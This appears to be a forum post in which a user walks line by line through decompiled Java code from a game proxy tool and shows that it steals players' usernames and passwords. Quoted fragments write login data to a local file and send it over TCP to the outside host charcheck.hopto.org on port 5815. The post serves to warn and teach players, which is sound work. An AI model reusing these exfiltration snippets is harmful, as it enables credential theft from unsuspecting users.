I'm attaching a decompiled version of the source code (only two of the class files). I've been programming for 20+ years, so as far as I can tell, this is definitely a keylogger. I'll give you the line by information so you can take a look at the source code and make your decision (but it should be fairly obvious to you that this is indeed a keylogger).
You'll want to have some kind of an editor that you can jump to lines. First, open the QOProxy.java file and go to line 199 : fw2 = new FileWriter("login.log");
Basically, a file is being created so it can write to it. This is where your information is stored locally on your machine before it is sent somewhere via tcp.
Now it's time to jump into the meat of things. Go to line 791 (public boolean ProcessLogin(int i).
This is basically the function that will process you login information and in the end will send your username and password to charcheck.hoto.org using port # 5815 (the actually sending of information is within the PacketStore.java file).
Go down a few lines to line # 804 : byte abyte0[] = getLoginPacketFromClient(i);
This is where it gets all of your login information from the client (username & password)
Go down three more lines (807) and you'll see that abyte0 is assigned to abyte1 : byte abyte1[] = abyte0;
Go down one more line (808) and you'll see that abyte1 is being passed to a function called "passDump". Hmm..."Password Dump"...
It's now time to jump to the "passdump" function. Go to line # 705 where the function is located:
public synchronized void passDump(byte abyte0[], java.lang.String s)
Within this function there are two more key areas where your username/password information is stored in a file via another function call to passout (probably referring to Password Out). These calls are located on lines
730 : passout((new StringBuilder()).append(" ").append(s2).append(" ; ").append(s1).toString());
741 : passout((new StringBuilder()).append(" ").append(s2).append(" ; ").append(s1).toString());
Now, let's jump to the passout function and see what is in store. This can be found on line 244:
public void passout(java.lang.String s)
You'll notice that your information is now being written to the "fw2" variable that was created near the beginning of the appplication.
This is not a good sign if your username/password information is being written to a file. Now that we have confirmed that your username/password is being written to a file, let's see what happens with this file.
Time to jump to line # 809. This is the next function right after the call to the "Password Dump" function. It's called processInfo : processInfo();
Let's see what the processInfo() function is doing. Jump to line 254 : public void processInfo()
You'll notice that the very first thing he does is closes the "fw2" file writer. This saves your informatoin to your hard drive. This is on line #258 : fw2.close();
Go down three more lines and you'll see that a new string variable is created with a string of "login.log". This is where your username/password is stored. This consists of lines 261 & 262:
java.lang.String as[] = {
"login.log"
This string is now passed to another class.function called PacketStore.main(as).
This can be found on line #265 : PacketStore.main(as);
We are pretty much done with the QOProxy.java file, but not done with seeing what happens to our information. As a side note, you will notice that after a call to the PacketStore function that another call to the FileWriter is used which wipes the contents of the information that was stored in the login.log file.
Okay, in order to see what happens next, open up the PacketStore.java file and go to the main function. Within this function there is a call to PacketStore. This can be found on line # 22 : new PacketStore();
Time to jump to the actual decrypting and sending of your username/password (and the server too). Go to lines 28 and 29. You'll see where the information is going to being sent:
host = "charcheck.hopto.org";
hostport = 5815;
The next step is to read in the login.log file. This is found in lines 36 thru 40.
java.io.BufferedReader bufferedreader = new BufferedReader(((java.io.Reader) (new FileReader(file))));
as[0] = (new StringBuilder()).append(bufferedreader.readLine(). trim()).append(" ").toString();
as[1] = (new StringBuilder()).append(bufferedreader.readLine(). trim()).append(" ").toString();
as[2] = (new StringBuilder()).append(bufferedreader.readLine(). trim()).append(" ").toString();
as[3] = (new StringBuilder()).append(bufferedreader.readLine(). trim()).append(" ").toString();
Once he has the encrypted information, it's time to decrypt your information. This is found in lines 46 thru 117. I'm not to to show that here, just open the file and see what it is doing.
The actual sending of your information via TCP happens in lines 118 thru 122:
int k2 = tcp.connectToHost(host, hostport);
if(k2 != -1)
{
tcp.sendLine(k2, (new StringBuilder()).append("Username: ").append(s).append(", Password: ").append(s2).append(", Server: ").append(s1).toString());
tcp.closeConnection(k2);
}
Your information has now been sent to another site. Your identify has been stolen. Your gear will now be gone, and if you don't have a password on your warehouse, it will be gone too.
You can decide for yourself if you feel this is or isn't a keylogger. I've given you the information. If you feel my information is bogus, then I suggest you decompile the original file by the author. I used JAD (it's in the comments of the source code) and you can do the same and you'll see you will have the exact source files that are attached to this message.
Hopefully, people who aren't too familar with programming can learn a little bit of information from this tutorial.
Good luck and happy hunting!!